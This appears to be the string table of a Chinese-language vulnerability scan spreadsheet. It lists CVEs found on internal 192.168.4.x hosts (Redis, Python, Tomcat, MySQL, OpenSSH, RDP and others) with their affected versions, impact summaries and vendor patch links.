http://www.securityfocus.com/bid/83733
http://www.securitytracker.com/id/1035133</t>
  </si>
  <si>
    <t>MS11-049：Microsoft XML Editor 信息泄露漏洞(2543893)(CVE-2011-1280)</t>
  </si>
  <si>
    <t>攻击者可能会利用这些信息,进行信息收集,方便其进行下一步攻击。</t>
  </si>
  <si>
    <t>Microsoft 已发布一系列用于 SQL Server 2005、2008 和 2008 R2 的修补程序，详请参考：https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-049</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-049
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-119</t>
  </si>
  <si>
    <t>http://192.168.4.207:8000</t>
  </si>
  <si>
    <t>http://192.168.4.207:60008</t>
  </si>
  <si>
    <t>60008</t>
  </si>
  <si>
    <t>http://192.168.4.207:80</t>
  </si>
  <si>
    <t>http://192.168.4.207:60009</t>
  </si>
  <si>
    <t>60009</t>
  </si>
  <si>
    <t>http://192.168.4.207:60001</t>
  </si>
  <si>
    <t>60001</t>
  </si>
  <si>
    <t>http://192.168.4.208:60008</t>
  </si>
  <si>
    <t>http://192.168.4.208:8000</t>
  </si>
  <si>
    <t>http://192.168.4.208:80</t>
  </si>
  <si>
    <t>https://192.168.4.208:8172</t>
  </si>
  <si>
    <t>8172</t>
  </si>
  <si>
    <t>http://192.168.4.208:60009</t>
  </si>
  <si>
    <t>http://192.168.4.208:60001</t>
  </si>
  <si>
    <t>http://192.168.4.204:8060/examples/servlets/servlet/SessionExample</t>
  </si>
  <si>
    <t>http://192.168.4.204:8021</t>
  </si>
  <si>
    <t>8021</t>
  </si>
  <si>
    <t>http://192.168.4.204:9995</t>
  </si>
  <si>
    <t>http://192.168.4.204:39</t>
  </si>
  <si>
    <t>http://192.168.4.204:8040</t>
  </si>
  <si>
    <t>http://192.168.4.204:4487</t>
  </si>
  <si>
    <t>http://192.168.4.204:10082</t>
  </si>
  <si>
    <t>http://192.168.4.204:80</t>
  </si>
  <si>
    <t>http://192.168.4.204:19080</t>
  </si>
  <si>
    <t>http://192.168.4.204:9190</t>
  </si>
  <si>
    <t>http://192.168.4.204:9993</t>
  </si>
  <si>
    <t>http://192.168.4.204:9991</t>
  </si>
  <si>
    <t>http://192.168.4.204:9992</t>
  </si>
  <si>
    <t>http://192.168.4.204:9994</t>
  </si>
  <si>
    <t>http://192.168.4.204:9997</t>
  </si>
  <si>
    <t>9997</t>
  </si>
  <si>
    <t>http://192.168.4.204:9996</t>
  </si>
  <si>
    <t>http://192.168.4.204:9991/</t>
  </si>
  <si>
    <t>http://192.168.4.204:8060/</t>
  </si>
  <si>
    <t>http://192.168.4.204:9994/</t>
  </si>
  <si>
    <t>http://192.168.4.204:9993/</t>
  </si>
  <si>
    <t>http://192.168.4.204:8060/docs/</t>
  </si>
  <si>
    <t>http://192.168.4.204:9995/</t>
  </si>
  <si>
    <t>http://192.168.4.204:9992/</t>
  </si>
  <si>
    <t>http://192.168.4.204:9997/</t>
  </si>
  <si>
    <t>http://192.168.4.204:9996/</t>
  </si>
  <si>
    <t>http://192.168.4.204:4487/</t>
  </si>
  <si>
    <t>http://192.168.4.204:80/</t>
  </si>
  <si>
    <t>http://192.168.4.204:19080/</t>
  </si>
  <si>
    <t>http://192.168.4.204:19080/v2/api-docs</t>
  </si>
  <si>
    <t>http://192.168.4.204:4487/actuator/health</t>
  </si>
  <si>
    <t>http://192.168.4.203:39</t>
  </si>
  <si>
    <t>http://192.168.4.203:8040</t>
  </si>
  <si>
    <t>http://192.168.4.203:80</t>
  </si>
  <si>
    <t>http://192.168.4.203:19080</t>
  </si>
  <si>
    <t>http://192.168.4.203:8020</t>
  </si>
  <si>
    <t>http://192.168.4.203:10082</t>
  </si>
  <si>
    <t>http://192.168.4.203:19850</t>
  </si>
  <si>
    <t>http://192.168.4.203:8021</t>
  </si>
  <si>
    <t>http://192.168.4.203:9992</t>
  </si>
  <si>
    <t>http://192.168.4.203:9994</t>
  </si>
  <si>
    <t>http://192.168.4.203:9997</t>
  </si>
  <si>
    <t>http://192.168.4.203:9996</t>
  </si>
  <si>
    <t>http://192.168.4.203:9190</t>
  </si>
  <si>
    <t>http://192.168.4.203:9995</t>
  </si>
  <si>
    <t>http://192.168.4.203:9993</t>
  </si>
  <si>
    <t>http://192.168.4.203:9991</t>
  </si>
  <si>
    <t>http://192.168.4.203:9992/</t>
  </si>
  <si>
    <t>http://192.168.4.203:9994/</t>
  </si>
  <si>
    <t>http://192.168.4.203:9997/</t>
  </si>
  <si>
    <t>http://192.168.4.203:9995/</t>
  </si>
  <si>
    <t>http://192.168.4.203:9991/</t>
  </si>
  <si>
    <t>http://192.168.4.203:8021/</t>
  </si>
  <si>
    <t>http://192.168.4.203:19850/</t>
  </si>
  <si>
    <t>http://192.168.4.203:8020/</t>
  </si>
  <si>
    <t>http://192.168.4.203:9996/</t>
  </si>
  <si>
    <t>http://192.168.4.203:9993/</t>
  </si>
  <si>
    <t>http://192.168.4.203:80/</t>
  </si>
  <si>
    <t>http://192.168.4.203:19080/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>http://192.168.4.203:19850/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>NFS共享导出列表检测(CVE-1999-0554)</t>
  </si>
  <si>
    <t>2049</t>
  </si>
  <si>
    <t>参见《NFS共享导出列表检测(CVE-1999-0554)-修复方案》</t>
  </si>
  <si>
    <t>http://www.tldp.org/HOWTO/NFS-HOWTO/security.html</t>
  </si>
  <si>
    <t>IPMI v2.0 密码哈希泄露(CVE-2013-4786)</t>
  </si>
  <si>
    <t>664</t>
  </si>
  <si>
    <t>远程攻击者能够通过 BMC 响应的 RAKP 消息 2 中的 HMAC 获取有效的用户帐户密码哈希信息。</t>
  </si>
  <si>
    <t>参见《IPMI v2.0 密码哈希泄露(CVE-2013-4786)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201307-123
http://fish2.com/ipmi/remote-pw-cracking.html</t>
  </si>
  <si>
    <t>SNMP代理默认社区名称（public）(CVE-1999-0517)</t>
  </si>
  <si>
    <t>ips-1893, ips-1892, ips-1411, ips-1412（无效）</t>
  </si>
  <si>
    <t>161</t>
  </si>
  <si>
    <t>攻击者可以使用这些信息来获得关于远程主机的更多信息，或者更改远程系统的配置(如果默认社区允许这样的修改)。</t>
  </si>
  <si>
    <t>参见《SNMP代理默认社区名称（public）(CVE-1999-0517)-修复方案》</t>
  </si>
  <si>
    <t>https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-1999-0517</t>
  </si>
  <si>
    <t>623</t>
  </si>
  <si>
    <t>Microsoft RDP 远程代码执行(CVE-2019-0708)</t>
  </si>
  <si>
    <t>ips-10010279（有效）</t>
  </si>
  <si>
    <t>未经身份验证的远程攻击者可以通过一系列特制请求利用此漏洞来执行任意代码。</t>
  </si>
  <si>
    <t>参见《Microsoft RDP 远程代码执行(CVE-2019-0708)-修复方案》</t>
  </si>
  <si>
    <t>https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708
https://blog.csdn.net/HEAVEN569/article/details/119641579
https://msrc.microsoft.com/update-guide/zh-cn/vulnerability/CVE-2019-0708</t>
  </si>
  <si>
    <t>HP System Management Homepage &lt; 7.6 多个漏洞 (HPSBMU03653) (httpoxy)</t>
  </si>
  <si>
    <t>2381</t>
  </si>
  <si>
    <t>攻击者可利用此问题导致拒绝服务,执行任意代码或获取敏感信息。</t>
  </si>
  <si>
    <t>升级版本到 HP System Management Homepage (SMH) 7.6 或更新版本。</t>
  </si>
  <si>
    <t>https://httpoxy.org</t>
  </si>
  <si>
    <t>HP System Management Homepage ginkgosnmp.inc 命令执行漏洞(CVE-2013-3576)</t>
  </si>
  <si>
    <t>此输入后面用于“exec”调用，可能引起经过身份验证的攻击者执行任意命令。</t>
  </si>
  <si>
    <t>升级至 HP System Management Homepage 7.2.2 或更新。</t>
  </si>
  <si>
    <t>https://www.securityfocus.com/archive/1/528713/30/0/threaded
https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03895050-1
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201306-225</t>
  </si>
  <si>
    <t>SSL/TLS协议信息泄露漏洞(CVE-2016-2183)</t>
  </si>
  <si>
    <t>TLS、SSH 和 IPSec 协议以及其他协议和产品中使用的 DES 和 Triple DES 密码的生日限制约为 40 亿个块，这使得远程攻击者更容易通过生日攻击获取明文数据长时间的加密会话，如 CBC 模式下使用 Triple DES 的 HTTPS 会话所示，也称为“Sweet32”攻击</t>
  </si>
  <si>
    <t>参见《SSL_TLS协议信息泄露漏洞(CVE-2016-2183)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201608-448
https://sweet32.info/</t>
  </si>
  <si>
    <t>SSL/TLS 受诫礼(BAR-MITZVAH)攻击漏洞(CVE-2015-2808)</t>
  </si>
  <si>
    <t>Openssl &lt;= 1.0.2</t>
  </si>
  <si>
    <t>更新Openssl版本或禁用RC4加密,新版本Openssl已将RC4加密废除</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2015-2808</t>
  </si>
  <si>
    <t>OpenSSH: 8.4</t>
  </si>
  <si>
    <t>Redis 安全漏洞(CVE-2023-28856)</t>
  </si>
  <si>
    <t>redis: 6.2.7</t>
  </si>
  <si>
    <t>影响redis:6.0.0版本(含)到 6.0.18版本(含),6.2.0版本(含)到 6.2.11版本(含),7.0.0版本(含)到 7.0.10版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页https://github.com/redis/redis/</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28856</t>
  </si>
  <si>
    <t>Redis Labs Redis 安全漏洞(CVE-2023-45145)</t>
  </si>
  <si>
    <t>影响Redis:2.6.0版本(含)到6.2.14版本,7.0.0版本(含)到7.0.14版本,7.2.0版本(含)到7.2.2版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://github.com/redis/redis/security/advisories/GHSA-ghmp-889m-7cvx</t>
  </si>
  <si>
    <t>Python 资源管理错误漏洞(CVE-2020-8492)</t>
  </si>
  <si>
    <t>4388</t>
  </si>
  <si>
    <t>Python: 3.6.8</t>
  </si>
  <si>
    <t>影响Python:2.7.0版本(含)到2.7.17版本(含),3.5.0版本(含)到3.5.9版本(含),3.6.0版本(含)到3.6.10版本(含),3.7.0版本(含)到3.7.6版本(含),3.8版本(含)到3.8.1版本(含)</t>
  </si>
  <si>
    <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：
https://www.python.org/</t>
  </si>
  <si>
    <t>Python email.utils.parseaddr安全漏洞（CVE-2019-16056）</t>
  </si>
  <si>
    <t>影响Python:2.7.16(含)之前版本,3.0.0版本(含)到3.0.1版本(含),3.1.0版本(含)到3.1.5版本(含),3.2.0版本(含)到3.2.6版本(含),3.3.0版本(含)到3.3.7版本(含),3.4.0版本(含)到3.4.10版本(含),3.5.0版本(含)到3.5.7版本(含),3.6.0版本(含)到3.6.9版本(含),3.7.0版本(含)到3.7.4版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue34155</t>
  </si>
  <si>
    <t>Python 输入验证错误漏洞(CVE-2018-20852)</t>
  </si>
  <si>
    <t>影响Python:2.0版本(含)到2.7.16版本(含),3.0.0版本(含)到3.4.10版本,3.5.0版本(含)到3.5.7版本,3.6.0版本(含)到3.6.9版本,3.7.0版本(含)到3.7.3版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue35121</t>
  </si>
  <si>
    <t>Python 信任管理问题漏洞(CVE-2019-9636)</t>
  </si>
  <si>
    <t>影响Python:2.7.0版本(含)到2.7.16版本(含),3.0.0版本(含)到3.7.2版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue36216</t>
  </si>
  <si>
    <t>Python 数字错误漏洞(CVE-2018-20406)</t>
  </si>
  <si>
    <t>影响Python:3.4.0版本(含)到3.7.1版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://bugs.python.org/issue34656</t>
  </si>
  <si>
    <t>Python 注入漏洞(CVE-2020-26116)</t>
  </si>
  <si>
    <t>影响Python:3.0.0版本(含)到3.5.10版本,3.6.0版本(含)到3.6.12版本,3.7.0版本(含)到3.7.9版本,3.8.0版本(含)到3.8.5版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://python-security.readthedocs.io/vuln/http-header-injection-method.html</t>
  </si>
  <si>
    <t>Python 安全漏洞(CVE-2020-27619)</t>
  </si>
  <si>
    <t>影响Python:3.0.0版本(含)到3.9.0版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue41944</t>
  </si>
  <si>
    <t>Python 资源管理错误漏洞(CVE-2020-14422)</t>
  </si>
  <si>
    <t>影响Python:3.0.0版本(含)到3.5.10版本,3.6.0版本(含)到3.6.12版本,3.7.0版本(含)到3.7.9版本,3.8.0版本(含)到3.8.4版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue41004</t>
  </si>
  <si>
    <t>Python 注入漏洞(CVE-2019-18348)</t>
  </si>
  <si>
    <t>影响Python:2.0版本(含)到2.7.17版本(含),3.0版本(含)到3.5.10版本,3.6.0版本(含)到3.6.11版本,3.7.0版本(含)到3.7.8版本,3.8.0版本(含)到3.8.3版本</t>
  </si>
  <si>
    <t>Python 跨站脚本漏洞(CVE-2019-16935)</t>
  </si>
  <si>
    <t>影响Python:2.7.16(含)之前版本,3.0版本(含)到3.6.9版本(含),3.7.0版本(含)到3.7.4版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：
https://www.python.org</t>
  </si>
  <si>
    <t>Python 信任管理问题漏洞(CVE-2019-10160)</t>
  </si>
  <si>
    <t>影响Python:2.7版本,3.5版本,3.6版本,3.7版本,3.8.0a4版本(含)到3.8.0b1版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue36742</t>
  </si>
  <si>
    <t>python Redis Labs Redis和Python 注入漏洞(CVE-2019-9947)</t>
  </si>
  <si>
    <t>影响Python:2.0版本(含)到2.7.16版本(含),3.0.0版本(含)到3.7.2版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue35906</t>
  </si>
  <si>
    <t>Python 注入漏洞(CVE-2019-9740)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201903-484
https://docs.ansible.com/ansible-tower/3.3.6/html/release-notes/relnotes.html#ansible-tower-version-3-3-6
https://docs.ansible.com/ansible-tower/3.5.1/html/release-notes/relnotes.html#ansible-tower-version-3-5-1
https://docs.ansible.com/ansible-tower/3.4.4/html/release-notes/relnotes.html#ansible-tower-version-3-4-4</t>
  </si>
  <si>
    <t>Python 命令注入漏洞(CVE-2015-20107)</t>
  </si>
  <si>
    <t>影响Python:3.10.4以下版本(含)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：  https://github.com/python/cpython/issues/68966</t>
  </si>
  <si>
    <t>Python 信息泄露漏洞(CVE-2021-3426)</t>
  </si>
  <si>
    <t>影响Python:2.7.18以下版本,3.6.0版本(含)到3.6.13版本,3.7.0版本(含)到3.7.10版本,3.8.0版本(含)到3.8.8版本,3.9.0版本(含)到3.9.3版本,3.10.0.alpha1版本(含)到3.10.0.alpha6版本(含)</t>
  </si>
  <si>
    <t xml:space="preserve">厂商补丁: Python ------------------ 目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://bugzilla.redhat.com/show_bug.cgi?id=1935913 </t>
  </si>
  <si>
    <t>Python 注入漏洞(CVE-2022-0391)</t>
  </si>
  <si>
    <t>影响Python:3.6.14以下版本,3.7.0版本(含)到3.7.11版本,3.8.0版本(含)到3.8.11版本,3.9.0版本(含)到3.9.5版本,3.10.0.alpha1版本(含)到3.10.0.alpha6版本(含)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://bugs.python.org/issue43882</t>
  </si>
  <si>
    <t>cpython 环境问题漏洞(CVE-2021-23336)</t>
  </si>
  <si>
    <t>影响Python:3.8.0版本(含)到3.8.8版本,3.7.0版本(含)到3.7.10版本,3.6.0版本(含)到3.6.13版本,3.9.10版本(含)到3.9.2版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/python/cpython/pull/24297</t>
  </si>
  <si>
    <t>https://github.com/python/cpython/pull/24297</t>
  </si>
  <si>
    <t>Apache Tomcat HTTP请求走私漏洞(CVE-2022-42252)</t>
  </si>
  <si>
    <t>8180</t>
  </si>
  <si>
    <t>Tomcat: 9.0.96</t>
  </si>
  <si>
    <t>影响Tomcat: 8.5.0版本(含)到8.5.82版本(含),9.0.0版本(含)到9.0.67版本(含),10.1.0版本(含)到10.1.0-M20版本(含),10.0.0版本(含)到10.0.26版本(含)</t>
  </si>
  <si>
    <t>当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下： Apache Tomcat系列10 https://tomcat.apache.org/download-10.cgi Apache Tomcat系列9 https://tomcat.apache.org/download-90.cgi Apache Tomcat系列8 https://tomcat.apache.org/download-80.cgi</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread/zzcxzvqfdqn515zfs3dxb7n8gty589sq</t>
  </si>
  <si>
    <t>Apache Tomcat 注入漏洞(CVE-2022-45143)</t>
  </si>
  <si>
    <t>影响Tomcat:10.1.0版本(含)到10.1.1版本(含),9.0.40版本(含)到9.0.68版本(含),8.5.83版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread/yqkd183xrw3wqvnpcg3osbcryq85fkzj</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread/yqkd183xrw3wqvnpcg3osbcryq85fkzj</t>
  </si>
  <si>
    <t>Apache Tomcat 竞争条件问题漏洞(CVE-2021-43980)</t>
  </si>
  <si>
    <t>影响Tomcat:10.1.0-M1版本(含)到10.1.0-M12版本(含),10.0.0版本(含)到10.0.18版本(含),9.0.0版本(含)到9.0.60版本(含),8.5.0版本(含)到8.5.77版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://lists.apache.org/thread/3jjqbsp6j88b198x5rmg99b1qr8ht3g3</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread/3jjqbsp6j88b198x5rmg99b1qr8ht3g3</t>
  </si>
  <si>
    <t>Apache Tomcat 拒绝服务漏洞(CVE-2023-24998)</t>
  </si>
  <si>
    <t>影响tomcat:10.1.0版本(含)到10.1.4版本(含),9.0.0版本(含)到9.0.70版本(含),8.5.0版本(含)到8.5.84版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://tomcat.apache.org/security-9.html</t>
  </si>
  <si>
    <t>Apache HTTP/2拒绝服务漏洞（CVE-2023-44487）</t>
  </si>
  <si>
    <t>影响apache tomcat:从8.5.0 （含）开始 至（含）8.5.93,9.0.0 （含） 至9.0.80 （含）,从10.1.0 （含）至（含）10.1.13版本,从11.0.0-M1(含)至11.0.0-M11(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://lists.apache.org/thread/5py8h42mxfsn8l1wy6o41xwhsjlsd87q</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2023-44487</t>
  </si>
  <si>
    <t>Tomcat 远程代码执行漏洞(CVE-2024-50379)</t>
  </si>
  <si>
    <t>影响Tomcat:9.0.0.M1版本(含)到9.0.98版本,10.1.0-M1版本(含)到10.1.34版本,11.0.0-M1版本(含)到11.0.2版本</t>
  </si>
  <si>
    <t>安全版本： Apache Tomcat 11.0.2 Apache Tomcat 10.1.34 Apache Tomcat 9.0.98 官方已发布最新版本修复该漏洞，建议受影响用户将Tomcat升级到安全版本及以上的版本。 下载链接： Tomcat 11：https://tomcat.apache.org/download-11.cgi Tomcat 10：https://tomcat.apache.org/download-10.cgi Tomcat 9：https://tomcat.apache.org/download-90.cgi</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r</t>
  </si>
  <si>
    <t>MariaDB 安全漏洞(CVE-2022-32081)</t>
  </si>
  <si>
    <t>mariadb: 10.6.8</t>
  </si>
  <si>
    <t>影响MariaDB:10.4.0版本(含)到10.4.26版本,10.5.0版本(含)到10.5.17版本,10.6.0版本(含)到10.6.9版本,10.7.0版本(含)到10.7.5版本,10.8.0版本(含)到10.8.4版本,10.9.0版本(含)到10.9.2版本</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://jira.mariadb.org/browse/MDEV-26420</t>
  </si>
  <si>
    <t>OpenSSH 安全漏洞(CVE-2021-28041)</t>
  </si>
  <si>
    <t>影响OpenSSH:8.5以下版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db</t>
  </si>
  <si>
    <t>https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db</t>
  </si>
  <si>
    <t>Redis 输入验证错误漏洞（CVE-2022-35977）</t>
  </si>
  <si>
    <t>影响redis:6.0版本(含)到6.0.17版本,6.2.0版本(含)到6.2.9版本,7.0版本(含)到7.0.8版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/redis/redis/releases/tag/7.0.8</t>
  </si>
  <si>
    <t>https://github.com/redis/redis/releases/tag/7.0.8</t>
  </si>
  <si>
    <t>Redis 安全漏洞(CVE-2022-24834)</t>
  </si>
  <si>
    <t>影响Redis:7.0.0版本(含)到7.0.12版本,6.2.0版本(含)到6.2.13版本,2.6.0版本(含)到6.0.20版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/redis/redis/security/advisories/GHSA-p8x2-9v9q-c838</t>
  </si>
  <si>
    <t>Redis Lua 库命令栈溢出致远程代码执行漏洞(CVE-2024-31449)</t>
  </si>
  <si>
    <t>影响redis:2.6.0版本(含)到6.2.16版本,7.0.0版本(含)到7.2.6版本,7.4.0版本(含)到7.4.1版本</t>
  </si>
  <si>
    <t>目前厂商已发布最新版本以修复漏洞，建议升级至最新版本</t>
  </si>
  <si>
    <t>https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5</t>
  </si>
  <si>
    <t>Python 资源管理错误漏洞（CVE-2018-1060）</t>
  </si>
  <si>
    <t>影响Python:2.7.15之前版本,3.0版本(含)到3.4.9版本,3.5.0版本(含)到3.5.5版本(含),3.6.0版本(含)到3.6.4版本(含),3.6.5版本(含)到3.7.0版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://docs.python.org/3.6/whatsnew/changelog.html#python-3-6-5-final</t>
  </si>
  <si>
    <t>Python输入验证错误漏洞（CVE-2023-24329）</t>
  </si>
  <si>
    <t>影响Python:3.0.0版本(含)到3.7.17版本,3.8.0版本(含)到3.8.17版本,3.9.0版本(含)到3.9.17版本,3.10.0版本(含)到3.10.12版本,3.11.0版本(含)到3.11.4版本</t>
  </si>
  <si>
    <t>厂商补丁:Python------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://github.com/python/cpython/releases/tag/v3.12.0a5</t>
  </si>
  <si>
    <t>nginx 安全漏洞（CVE-2018-16843）</t>
  </si>
  <si>
    <t>nginx: 1.14.0</t>
  </si>
  <si>
    <t>影响nginx:1.9.5版本(含)到1.14.1版本,1.15版本(含)到1.15.6版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://mailman.nginx.org/pipermail/nginx-announce/2018/000220.html</t>
  </si>
  <si>
    <t>http://mailman.nginx.org/pipermail/nginx-announce/2018/000220.html</t>
  </si>
  <si>
    <t>mysql: 5.7.17</t>
  </si>
  <si>
    <t>Oracle MySQL Server: Locking 安全漏洞(CVE-2020-14812)</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.49版本(含),5.7.0版本(含)到5.7.31版本(含),8.0.0版本(含)到8.0.21版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-952</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-2763)</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.47版本(含),5.7.0版本(含)到5.7.29版本(含),8.0.0版本(含)到8.0.19版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://www.oracle.com/security-alerts/cpuapr2020.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2020-2760)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.29版本(含),8.0.0版本(含)到8.0.19版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2020-2765)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2020-2790)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.28版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14540)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.30版本(含),8.0.0版本(含)到8.0.20版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202007-723
https://access.redhat.com/errata/RHSA-2020:3518
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911</t>
  </si>
  <si>
    <t>Oracle MySQL Server 授权问题漏洞(CVE-2020-14867)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-929</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server: Stored Procedure 安全漏洞(CVE-2020-14672)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-958</t>
  </si>
  <si>
    <t>Oracle MySQL Server FTS 安全漏洞(CVE-2020-14765)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-965</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3647)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.36版本(含),5.7.0版本(含)到5.7.18版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1283
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2787
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>Apache Tomcat 拒绝服务漏洞(CVE-2022-29885)</t>
  </si>
  <si>
    <t>ips-11024821（有效）</t>
  </si>
  <si>
    <t>未配置 EncryptInterceptor 则全版本受影响配置 EncryptInterceptor 如下版本受影响：10.1.0-M1 ≤ Apache Tomcat ≤ 10.1.0-M1410.0.0-M1 ≤ Apache Tomcat ≤ 10.0.209.0.13 ≤ Apache Tomcat ≤ 9.0.628.5.38 ≤ Apache Tomcat ≤ 8.5.78</t>
  </si>
  <si>
    <t>当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下：https://tomcat.apache.org/security-10.html、https://tomcat.apache.org/security-9.html、https://tomcat.apache.org/security-8.html</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread/2b4qmhbcyqvc7dyfpjyx54c03x65vhcv
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2022_04969&amp;lang=ZH-CN
https://tomcat.apache.org/security-10.html
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html</t>
  </si>
  <si>
    <t>Apache Tomcat 权限许可和访问控制问题漏洞(CVE-2022-23181)</t>
  </si>
  <si>
    <t>10.1.0-M1≤Apache Tomcat≤10.1.0-M8 10.0.0-M5≤Apache Tomcat≤10.0.14 9.0.35≤Apache Tomcat≤9.0.56 8.5.55≤Apache Tomcat≤8.5.73</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://Tomcat.apache.org/security-7.html</t>
  </si>
  <si>
    <t>https://tomcat.apache.org/security-10.html
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html
